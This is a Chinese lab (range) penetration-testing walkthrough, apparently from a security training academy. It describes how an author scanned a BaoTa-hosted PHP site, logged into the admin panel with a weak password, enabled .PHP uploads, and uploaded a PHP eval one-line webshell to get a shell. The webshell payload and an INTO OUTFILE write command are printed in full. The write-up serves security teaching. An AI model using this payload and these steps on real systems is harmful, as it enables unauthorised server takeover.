本文由掌控安全学院 - 冰封小天堂 投稿

0x00:探测IP

首先打开时候长这个样，一开始感觉是迷惑行为，试了试/admin，/login这些发现都没有

随后F12查看网络，看到几个js文件带有传参，就丢sqlmap跑了一下无果

随后也反查了域名一下，发现没有域名，是阿里云的，这里突然醒悟，我第一步是信息收集。

kali linux启动，nmap 启动，直接常规扫描一波，发现开启了这么多，ftp和ssh可以爆破，但因为是靶场弱口令暂时不想了，smtp和pop3都是邮件服务，80是个幌子也不予考虑，8888是宝塔管理界面，得到信息这是宝塔搭建的，弱口令试了下无果，而且限制登陆次数，暂时先记下，8081重点，这里我第一次访问它貌似因为网络问题没有打开，所以我就以为不是，结果后来扫了全端口还是这几个......

访问8081端口，得到页面一个，搜了下，这个是宝塔创建完成的正常页面，使用御剑进行目录扫描

0x01:挖掘漏洞

这里一开始我并没有搞到路径，还是花哥给了test这个路径才开始的，主页很普通就正常的那些销售页面

虽然有跟数据库交互，但都已经写死了，你修改值可以，但是+ - *什么的都不会起作用，注入点无效，有留言板但是这靶场没有机器人访问，所以xss随手试了个简单的就扔了，搜索框也进行了xss和sql测试，无果

然后开始扫目录，刚开始扫的时候后面还没扫到，不过扫到了使用手册，直接去访问

这里需要将编码换成utf-8，这里看到了后台地址，我们直接去访问，得到后台地址

既然还没验证码什么的第一想法就是爆破了，但那之前先随手几个弱口令，admin/123456 admin/admin123，第二个直接进去了

管理员权限，奥里给，我们离成功很近了

0x02:挖掘后台信息

这里每个都要注意一下，细心很重要（至粗心大意的自己）

基本设置这里，发现可以控制上传文件后缀，自然把.PHP加上去

这里看到了数据库备份，但有提醒别乱搞就没碰，并没有看到明显的上传点，

在到处溜达了一下在系统信息这里看到了sql语句执行，自然就想到了mysql写一句话
并且在系统信息部分我们拿到了绝对路径出来，从路径看这是个linux系统

然后就是写文件，这里用了outfile和dumpfile，结果都不行，写txt也不行，陷入沉思这到底是什么情况

语句:select ‘<?php @eval($_POST[cmd]);?>’ INTO OUTFILE ‘/www/wwwroot/39.xx.xx.52/test/cmd.php’

回到扫描器，发现，哦吼phpinfo，居然没删，

这里我以为绝对路径错了，仔细检查后发现没错，然后继续沉思，到底哪里出问题了，后来有小道消息说这是考文件上传的，那这么说都没开启写文件啊

0x03:寻找文件上传功能点

发现疑似可以利用的地方，虽然这里说是上传图片，不过类型都被我改了上传啥还不是咱说了算，上传试试

此处注意要允许运行flash，不然会无法点击选择文件之类的东西

选择我们的一句话，冲啊

成功上传，等等似乎不对，这样我没路径上传了：

抓包重来，这里我们并没看到啥可利用的信息，看来要抓返回包，右键选择它即可抓返回包

从返回中我们得到路径，直接getshell （这里我之前做的时候它每次都让我登录，所以我就放弃了这个点，结果写文章时候他又可以了）

0x04:备用方法

下面是如果上面的失败，如何操作,找到栏目管理，修改任意一个

这里也有一个一样的上传点，但我们现在的就是那个走不通，可以看到下面有个编辑器，我们选择附件

选择我们的一句话，注意这里也要允许运行flash才可以，不然会报错

直接上传上去

发现这里多了一个，说明传上去了，然后哦我们在提交一下，去这个页面看看

这里知道目录方法有多个，点击这个他会告诉我们，或者抓返回包，这里我用的最简单无脑的，我们直接去这个页面看一看,最后就可以看到该文件，直接你写的?xxxx=phpinfo(); 连接蚁剑即可

申明：本账号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法。

免费领取安全学习资料包！

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等

 

应急响应笔记

学习路线